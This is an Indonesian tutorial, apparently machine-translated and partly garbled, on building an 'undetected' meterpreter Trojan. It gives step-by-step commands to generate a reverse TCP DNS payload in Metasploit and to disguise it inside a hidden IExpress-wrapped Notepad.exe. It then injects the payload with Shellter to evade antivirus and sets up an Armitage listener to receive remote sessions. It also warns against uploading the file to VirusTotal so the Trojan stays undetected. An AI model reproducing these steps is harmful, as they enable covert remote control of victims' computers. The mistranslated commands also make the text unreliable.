Cara Buat Trojan Tidak Terdeteksi Menggunakan Nama Domain

Dalam tutorial ini saya akan menunjukkan cara untuk membuat meterpreter Trojan tidak terdeteksi menggunakan nama Domain. Saya telah mengambil panduan beberapa tutorial dan dibangun menjadi satu.

# Bagian pertama adalah menciptakan DNS Payload.

# Bagian kedua adalah menciptakan file executable.

# Bagian 3 adalah menggunakan baik dalam Shellter untuk membuat Trojan tidak terdeteksi Anda.

# Bagian 4 adalah menyiapkan pendengar Anda menggunakan Armitage.

Hal yang diperlukan:

• Kali Linux

• Windows

• Akun Tidak ada IP dengan nama domain. Sebuah port diteruskan pada router Anda. Shellter. shellterproject.com

Bagian 1: Menciptakan DNS Payload Menggunakan Kali.

• Langkah 1: Buka Metasploit pada Kali dengan mengetikkan msfconsole di terminal.

• Langkah 2: Jenis penggunaan payload / windows / meterpreter / terbalik tcp dns (menggarisbawahi antara terbalik dan tcp dan antara tcp dan dns)

• Langkah 3: Jenis pilihan acara. Ini akan menunjukkan kepada Anda bahwa Anda perlu mengatur LHOST dan LPORT.

• Langkah 4: Type set LHOST (hostname Anda buat, tanpa http: //)

• Langkah 5:. Jenis mengatur LPORT (port Anda telah diteruskan di set router Anda untuk mesin Kali)

• Langkah 6:. Ketik menghasilkan h Ini akan menampilkan pilihan untuk menghasilkan payload. Anda dapat memilih pilihan yang berbeda tapi setidaknya lakukan hal berikut

• Langkah 7: Jenis menghasilkan -f (nama file yang Anda pilih untuk payload) jendela p t baku Ex. menghasilkan jendela DNS p -f -t baku

• Langkah 8: Keluar terminal dan klik File. payload Anda akan di Rumah Anda (Kecuali Anda menyetel sebuah opsi untuk lokasi yang berbeda)

• Langkah 9: Transfer payload dibuat untuk Windows. (Sadarilah bahwa AV Anda mungkin mendeteksi itu pada kondisi saat ini)

Bagian 2: Membuat file executable pada Windows.

• Langkah 1: Pilih opsi yang sesuai untuk Anda. (Penting sebagai Shellter tidak bekerja dengan 64 bit executable) 32-bit Windows - Arahkan ke C: \ Windows \ System32 \ iexpress.exe (Klik kanan dan pilih jalankan sebagai administrator) 64-bit Windows - Arahkan ke C: \ Windows \ SysWOW64 \ iexpress.exe (Klik kanan dan pilih jalankan sebagai administrator)

• Langkah 2: Pilih Buat baru Diri Ekstraksi Directive File dan klik berikutnya.

• Langkah 3: Klik berikutnya pada halaman Purpose Paket.

• Langkah 4: Ketik judul paket. (Ini bisa apa saja yang Anda inginkan) Ex: Notepad.exe

• Langkah 5: Tidak Prompt, klik next.

• Langkah 6: Jangan menampilkan lisensi. Klik next.

• Langkah 7: Klik Add dan pilih file di komputer Anda. Aku memilih Notepad.exe di folder C: \ Windows \ System32. Klik Next.

• Langkah 8: Klik drop panah dan pilih nama file yang Anda pilih pada layar terakhir. Klik Next.

• Langkah 9: Pilih Tersembunyi dan kemudian klik berikutnya.

• Langkah 10: Tidak ada pesan. klik Next

• Langkah 11: Klik Browse dan ketik nama untuk file malware dan tujuan. Periksa Sembunyikan Mengekstrak Kemajuan Animasi dari pengguna Berkas. Klik Next.

• Langkah 12: Pilih Tidak restart dan kemudian klik berikutnya.

• Langkah 13: Anda kemudian dapat memilih untuk menyimpan direktif ekstraksi diri atau tidak menyimpan. Klik Next.

• Langkah 14: Klik Next lagi pada buat Package. Kemudian klik Finish.

Bagian 3: Menggunakan kedua dibuat file di Shellter untuk membuat Trojan Anda.

• Langkah 1:. Buka folder yang Shellter di Klik kanan pada Shellter.exe dan klik Run as Administrator.

• Langkah 2: Tipe A untuk Auto.

• Langkah 3: Ketik N untuk No.

• Langkah 4: Ketik lokasi file EXE dibuat Anda dari Bagian 2 dan tekan enter. Biarkan Shellter melakukan hal itu selama 30 detik untuk satu menit.

• Langkah 5: Ketika diminta untuk memilih payload, tipe C untuk kustom.

• Langkah 6: Ketik lokasi payload Anda dibuat dalam Bagian 1 dan tekan enter.

• Langkah 7: Ketik N untuk ada DLL loader reflektif.

• Langkah 8: Tekan enter dan biarkan Shellter selesai melakukan itu hal. Jika tertulis Injection Terverifikasi! Anda harus memiliki Trojan tidak terdeteksi bekerja.

• Langkah 9: Tekan enter untuk keluar Shellter.

Bagian 4: Pengaturan pendengar Anda. (Anda bisa menggunakan Metasploit atau Armitage)

• Langkah 1: Kembali ke Kali.

• Langkah 2: Buka Terminal dan jenis Msfupdate

• Langkah 3: Setelah selesai Jenis apt-get install Armitage.

• Langkah 4: Jenis msfdb init

• Langkah 5: Buka Armitage

• Langkah 6: Klik Connect

• Langkah 7: Klik Yes

• Langkah 8: Setelah Armitage terbuka Jenis: penggunaan mengeksploitasi / multi-/ handler

• Langkah 9: Jenis mengatur LHOST 0.0.0.0

• Langkah 10: Jenis set LPORT (port Anda diteruskan di router Anda)

• Langkah 11: Jenis set payload windows / meterpreter / terbalik tcp dns

• Langkah 12: Jenis set exitonsession palsu

• Opsional: Langkah 13: Jenis set autorunscript bermigrasi -f

• Opsional: Langkah 14: Jenis set prependmigrate Benar

• Langkah 15: Jenis mengeksploitasi -j (Langkah opsional yang bermigrasi proses secara otomatis sehingga sesi tidak berakhir sebelum Anda dapat melakukannya secara manual)

Sekarang Anda harus dapat menjalankan Trojan tidak terdeteksi dan mendapatkan sesi meterpreter. JANGAN dibuat Upload executable Anda ke situs online seperti Virus Total.